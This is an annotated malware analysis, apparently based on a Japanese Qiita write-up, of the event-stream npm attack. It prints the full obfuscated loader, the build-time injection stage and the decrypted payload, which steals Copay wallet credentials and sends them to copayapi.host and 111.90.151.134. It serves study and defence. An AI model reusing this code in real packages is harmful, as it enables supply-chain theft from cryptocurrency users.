未来のハッカー(自称)がevent-stream騒動の攻撃コードを説明する ref: https://qiita.com/stmkza/items/2cdc03d2965499222b55
// Second stage, in its shipped (minified) form. The exported function receives `e`, a
// hex-encoded ciphertext, and does nothing unless process.argv[2] matches
// /build\:.*\-release/, so it only acts during a release build.
// It decrypts `e` with AES-256, using the package description (npm_package_description)
// as the password, and appends the plaintext to @zxing/library's ReedSolomonDecoder.js,
// first cutting the file at any earlier "\n/*@@*/" marker so repeated runs do not stack.
// The file's original atime/mtime are put back after the write, and an 'exit' handler
// writes the original content back, so the change exists only while the build runs and
// timestamp-based change checks will not notice it.
// Both catch blocks are empty: any failure is silent.
/*@@*/module.exports=function(e){try{if(!/build\:.*\-release/.test(process.argv[2]))return;var t=process.env.npm_package_description,r=require("fs"),i="./node_modules/@zxing/library/esm5/core/common/reedsolomon/ReedSolomonDecoder.js",n=r.statSync(i),c=r.readFileSync(i,"utf8"),o=require("crypto").createDecipher("aes256",t),s=o.update(e,"hex","utf8");s="\n"+(s+=o.final("utf8"));var a=c.indexOf("\n/*@@*/");0<=a&&(c=c.substr(0,a)),r.writeFileSync(i,c+s,"utf8"),r.utimesSync(i,n.atime,n.mtime),process.on("exit",function(){try{r.writeFileSync(i,c,"utf8"),r.utimesSync(i,n.atime,n.mtime)}catch(e){}})}catch(e){}}; |
// Loader excerpt: one-letter aliases for `require` and `process`. The rest of the loader
// calls them only as r(...) and t[...], so neither name appears again in readable form.
var r = require, | |
t = process; |
// Loader excerpt (obfuscated form): n[0] is the ciphertext handed to the decipher `u`.
// The input and output encodings are not written literally; they are stored hex-encoded
// in n[8] and n[9] and turned back into strings by e().
var a = u.update(n[0], e(n[8]), e(n[9])); | |
// Append whatever the decipher still holds; `a` is then the complete decrypted text.
a += u.final(e(n[9])); |
// The same decryption step with the hidden strings written out:
// hex-encoded ciphertext in, UTF-8 text out.
var a = u.update(n[0], 'hex', 'utf8') + u.final('utf8'); |
// Loader excerpt (obfuscated form): how the decrypted text `a` gets executed.
// module.constructor is the class of the current module object, so this creates a
// fresh, empty module instance.
var f = new module.constructor; | |
// Copy the current module's lookup paths onto it (presumably so require() calls made by
// the decrypted code resolve as they would from this file).
f.paths = module.paths; | |
// Call a method of f whose name is hidden hex-encoded in n[7], passing the decrypted
// text and an empty string.
f[e(n[7])](a, ''); | |
// Whatever the decrypted code exported is then called as a function with n[1].
f.exports(n[1]); |
// Same excerpt as it appears in the loader, before the hidden method name is resolved.
// A new module instance is created from the current module's class.
var f = new module.constructor; | |
f.paths = module.paths; | |
// The method name comes from n[7], decoded from hex at run time, so it cannot be found
// by searching the source for the name itself.
f[e(n[7])](a, ''); | |
// The export produced by the decrypted text is invoked with n[1] as its argument.
f.exports(n[1]); |
// The execution step with the hidden method name written out.
var f = new module.constructor; | |
f.paths = module.paths; | |
// _compile is Node's internal Module method that evaluates a source string as a CommonJS
// module; here the source is the decrypted text `a` and the filename is ''.
// The decrypted code therefore runs without `eval` or `new Function` ever appearing in
// the file, so a keyword search for those finds nothing.
f._compile(a, ''); | |
// The compiled module exported a function; it is called with n[1].
f.exports(n[1]); |
// Second stage, reformatted and annotated by the gist author.
// The leading /*@@*/ is the marker this same code searches for ("\n/*@@*/") when it
// truncates the target file before appending.
/*@@*/ | |
module.exports = function (e) { | |
// e is the encrypted script (passed as a hex string, see update() below)
try { | |
// Exit unless the command-line argument is build-related (so this only triggers during a build)
if (!/build\:.*\-release/.test(process.argv[2])) return; | |
var fs = require('fs'); | |
// Target: a file inside another installed dependency, addressed relative to the working directory.
var i = './node_modules/@zxing/library/esm5/core/common/reedsolomon/ReedSolomonDecoder.js'; | |
// Remember the file's timestamps and its original content before touching it.
var n = fs.statSync(i); | |
var c = fs.readFileSync(i, 'utf8'); | |
// Decrypt the encrypted script (the decrypted result is shown in the next listing).
// The password is written here as a literal; in the minified form on this page the same
// argument is process.env.npm_package_description.
var o = require('crypto').createDecipher('aes256', 'A Secure Bitcoin Wallet'); | |
var s = o.update(e, 'hex', 'utf8'); | |
s = '\n' + s + o.final('utf8'); | |
// If an earlier run already appended a payload, cut the content back to just before the marker.
var a = c.indexOf('\n/*@@*/'); | |
0 <= a && (c = c.substr(0, a)); | |
// Tamper with a file that other code uses (inject the script that had been encrypted)
fs.writeFileSync(i, c + s, 'utf8'); | |
// Put the saved access/modification times back, so the write does not show up as a newer mtime.
fs.utimesSync(i, n.atime, n.mtime); | |
// When the process exits
process.on('exit', function () { | |
try { | |
// Return the tampered file to its state before tampering (the modification time is left unchanged too)
fs.writeFileSync(i, c, 'utf8'); | |
fs.utimesSync(i, n.atime, n.mtime); | |
} catch (e) { | |
// errors during restore are deliberately ignored
} | |
}); | |
} catch (e) { | |
// any failure (missing file, wrong password, ...) is swallowed, so nothing is reported
} | |
}; |
// Third stage: per the author's note in the previous listing, this is the decrypted
// script that gets appended to ReedSolomonDecoder.js. It runs inside the wallet
// application, reads stored wallet data and posts it to two hard-coded hosts.
// Network indicators visible in this listing: HTTP POST to port 8080 of
// copayapi.host and 111.90.151.134, paths "/c" and "/p", Content-Type text/html.
/*@@*/ | |
!function () { | |
function e() { | |
try { | |
var http = require('http'); | |
var crypto = require('crypto'); | |
// Public key embedded in the payload; everything uploaded is encrypted with it, so
// captured traffic can only be read by whoever holds the matching private key.
var publicKey = '-----BEGIN PUBLIC KEY-----\n' + | |
'MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxoV1GvDc2FUsJnrAqR4C\n' + | |
'DXUs/peqJu00casTfH442yVFkMwV59egxxpTPQ1YJxnQEIhiGte6KrzDYCrdeBfj\n' + | |
'BOEFEze8aeGn9FOxUeXYWNeiASyS6Q77NSQVk1LW+/BiGud7b77Fwfq372fUuEIk\n' + | |
'2P/pUHRoXkBymLWF1nf0L7RIE7ZLhoEBi2dEIP05qGf6BJLHPNbPZkG4grTDv762\n' + | |
'PDBMwQsCKQcpKDXw/6c8gl5e2XM7wXhVhI2ppfoj36oCqpQrkuFIOL2SAaIewDZz\n' + | |
'LlapGCf2c2QdrQiRkY8LiUYKdsV2XsfHPb327Pv3Q246yULww00uOMl/cJ/x76To\n' + | |
'2wIDAQAB\n' + | |
'-----END PUBLIC KEY-----'; | |
/**
 * Sends data by HTTP POST to port 8080 of the given host.
 * @param e host name, written in hexadecimal
 * @param t path to POST to
 * @param n data to send
 */ | |
function uploadFile(e, t, n) { | |
// The host name is decoded from hex here, so it never appears as plain text in the source.
e = Buffer.from(e, 'hex').toString(); | |
var r = http.request({ | |
hostname: e, | |
port: 8080, | |
method: 'POST', | |
path: '/' + t, | |
headers: {'Content-Length': n.length, 'Content-Type': 'text/html'} | |
}, function () { | |
// the response is ignored
}); | |
// Request errors are ignored as well; the body is written and the request closed.
r.on('error', function (e) { | |
}), r.write(n), r.end(); | |
} | |
// r(e, t): encrypt the string t and upload it to both hosts under path e.
function r(e, t) { | |
// The text is cut into slices of 200 characters; each slice is encrypted separately
// and the hex results are joined with '+'.
for (var n = '', r = 0; r < t.length; r += 200) { | |
var o = t.substr(r, 200); | |
// The data is encrypted with public-key cryptography
n += crypto.publicEncrypt(publicKey, Buffer.from(o, 'utf8')).toString('hex') + '+'; | |
} | |
// Send to copayapi.host
uploadFile('636f7061796170692e686f7374', e, n); | |
// Send to 111.90.151.134
uploadFile('3131312e39302e3135312e313334', e, n); | |
} | |
// l(t, n): read the JSON stored under key/file name t and pass the parsed value to n.
// Under Cordova it reads file t from cordova.file.dataDirectory; otherwise it tries
// localStorage first and then chrome.storage.local. Every failure is swallowed.
function l(t, n) { | |
if (window.cordova) try { | |
var e = cordova.file.dataDirectory; | |
resolveLocalFileSystemURL(e, function (e) { | |
// {create: !1} is {create: false}: only an existing file is opened
e.getFile(t, {create: !1}, function (e) { | |
e.file(function (e) { | |
var t = new FileReader; | |
t.onloadend = function () { | |
return n(JSON.parse(t.result)); | |
}, t.onerror = function (e) { | |
t.abort(); | |
}, t.readAsText(e); | |
}); | |
}); | |
}); | |
} catch (e) { | |
} else { | |
try { | |
var r = localStorage.getItem(t); | |
if (r) return n(JSON.parse(r)); | |
} catch (e) { | |
} | |
try { | |
chrome.storage.local.get(t, function (e) { | |
if (e) return n(JSON.parse(e[t])); | |
}); | |
} catch (e) { | |
} | |
} | |
} | |
// global.CSSMap records, by xPubKey, which wallets were selected below.
// The stored 'profile' entry is read and each of its credentials is examined.
global.CSSMap = {}, l('profile', function (e) { | |
for (var t in e.credentials) { | |
var n = e.credentials[t]; | |
// Only credentials whose network is 'livenet' are considered; for each one the
// 'balanceCache-<walletId>' entry is read.
'livenet' == n.network && l('balanceCache-' + n.walletId, function (e) { | |
var t = this; | |
// The number before the first space of the cached balance is parsed. Wallets with
// coin 'btc' and balance < 100, or coin 'bch' and balance < 1000, are skipped;
// any other wallet is flagged in CSSMap and its credential object is uploaded
// as JSON under path 'c'.
t.balance = parseFloat(e.balance.split(' ')[0]), 'btc' == t.coin && t.balance < 100 || 'bch' == t.coin && t.balance < 1e3 || (global.CSSMap[t.xPubKey] = !0, r('c', JSON.stringify(t))); | |
}.bind(n)); | |
} | |
}); | |
// Wrap getKeys on bitcore-wallet-client's Credentials prototype: the original is kept
// as getKeysFunc and still returns its normal result to the caller.
var e = require('bitcore-wallet-client/lib/credentials.js'); | |
e.prototype.getKeysFunc = e.prototype.getKeys, e.prototype.getKeys = function (e) { | |
var t = this.getKeysFunc(e); | |
try { | |
// For a flagged wallet, the flag is removed (so this happens once per wallet) and the
// argument passed to getKeys plus the xPubKey are uploaded under path 'p'.
// NOTE(review): the argument is presumably the wallet password; confirm against
// bitcore-wallet-client.
global.CSSMap && global.CSSMap[this.xPubKey] && (delete global.CSSMap[this.xPubKey], r('p', e + '\\t' + this.xPubKey)); | |
} catch (e) { | |
} | |
return t; | |
}; | |
} catch (e) { | |
// the whole payload fails silently
} | |
} | |
// Under Cordova the payload waits for 'deviceready'; elsewhere it runs immediately.
window.cordova ? document.addEventListener('deviceready', e) : e(); | |
}(); |
/**
 * Loader helper: turns a hex-encoded string back into text.
 * The loader stores module names, property names and encodings in this form, so
 * none of them can be found by searching the source for the plain string.
 * @param {string} r hex-encoded string
 * @returns {string} the decoded text
 */
function e(r) {
  const bytes = Buffer.from(r, 'hex');
  return bytes.toString();
}
// The hex string decodes to './test/data', so this loads a module from the package's
// own test directory. Its export `n` is indexed as an array (n[0] .. n[9]) by the rest
// of the loader: ciphertext, an argument, and hex-encoded strings.
var n = require(e('2e2f746573742f64617461')); |
// Obfuscated form: reads process[<n[3]>][<n[4]>], with both property names stored
// hex-encoded in the data array and decoded by e() at run time.
var o = process[e(n[3])][e(n[4])]; |
// The same line with the two hidden property names written out.
var o = process['env']['npm_package_description']; |
// `o` is later used as the decryption password, so the payload can only be decrypted
// when the loader runs under a package whose description is the expected string.
var o = process.env.npm_package_description; // contents of the environment variable "npm_package_description"
// Stop quietly when no package description is set; nothing is logged or thrown.
if (!o) return; |
// Obfuscated form: the module name (n[2]), the function name (n[6]) and its first
// argument (n[5]) are all hex-encoded entries of the data array; `o` is the second argument.
var u = require(e(n[2]))[e(n[6])](e(n[5]), o); |
// The same line with the hidden strings written out: an AES-256 decipher whose password
// is the package description read into `o`.
var u = require('crypto').createDecipher('aes256', o); |
// First stage (loader), reformatted. It runs as soon as the file is loaded, decrypts a
// blob from the data array using the package description as the password, and executes
// the result. No module name, property name or encoding appears in readable form; all
// of them are hex strings in the data array, decoded by e().
!function () { | |
try { | |
// Aliases, so `require` and `process` appear only once in the loader.
var r = require; | |
var t = process; | |
// Hex string -> text.
function e(r) { | |
return Buffer.from(r, 'hex').toString(); | |
} | |
// Load the data array; the hex string decodes to './test/data'.
var n = r(e('2e2f746573742f64617461')); | |
// process[<n[3]>][<n[4]>]; the resolved form on this page is process.env.npm_package_description.
var o = t[e(n[3])][e(n[4])]; | |
// No description set: stop without any output.
if (!o) return; | |
// Resolved form on this page: require('crypto').createDecipher('aes256', o).
var u = r(e(n[2]))[e(n[6])](e(n[5]), o); | |
// Decrypt n[0]; resolved form on this page: update(n[0], 'hex', 'utf8') + final('utf8').
var a = u.update(n[0], e(n[8]), e(n[9])); | |
a += u.final(e(n[9])); | |
// Build a fresh module instance and run the decrypted text in it; the method name in
// n[7] is shown resolved on this page as _compile.
var f = new module.constructor; | |
f.paths = module.paths; | |
f[e(n[7])](a, ''); | |
// Call the function that the decrypted code exported, passing n[1].
f.exports(n[1]); | |
} catch (r) { | |
// Any error, including a failed decryption under a different description, is swallowed.
} | |
}(); |